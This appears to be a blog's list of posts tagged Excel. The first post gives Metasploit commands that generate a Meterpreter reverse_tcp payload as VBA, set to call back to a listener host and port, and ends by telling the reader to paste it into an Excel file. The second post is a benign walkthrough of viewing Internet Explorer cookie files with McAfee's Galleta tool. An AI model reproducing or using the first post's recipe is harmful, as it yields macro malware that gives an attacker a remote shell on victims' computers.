Showing posts with label Excel. Show all posts
Showing posts with label Excel. Show all posts

Friday, February 14, 2020

Generate Meterpreter Metasploit VBA

msfconsole
use payload/windows/meterpreter/reverse_tcp
show options
setg LHOST 10.10.10.10
setg LPORT 3000
generate -t vba -f meterpreter.vba

copy & paste into excel

Wednesday, November 28, 2018

Friday, May 8, 2015

McAfee Cookie Analyzer - Galleta

McAfee has a free tool called Galetta which seems to make viewing Internet Explorer Cookies a little easier.

1.) Find a cookie text file (in a location like C:\Users\XXXX\AppData\Roaming\Microsoft\Windows\Cookies\Low )


2.) Run Galleta
    ] galetta.exe C:\Users\XXXX\AppData\Roaming\Microsoft\Windows\Cookies\Low\EKHU3P50.txt > c:\cookies.txt

3.) Open the output cookies.txt with Excel


4.) View the cookies in a more readable format


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.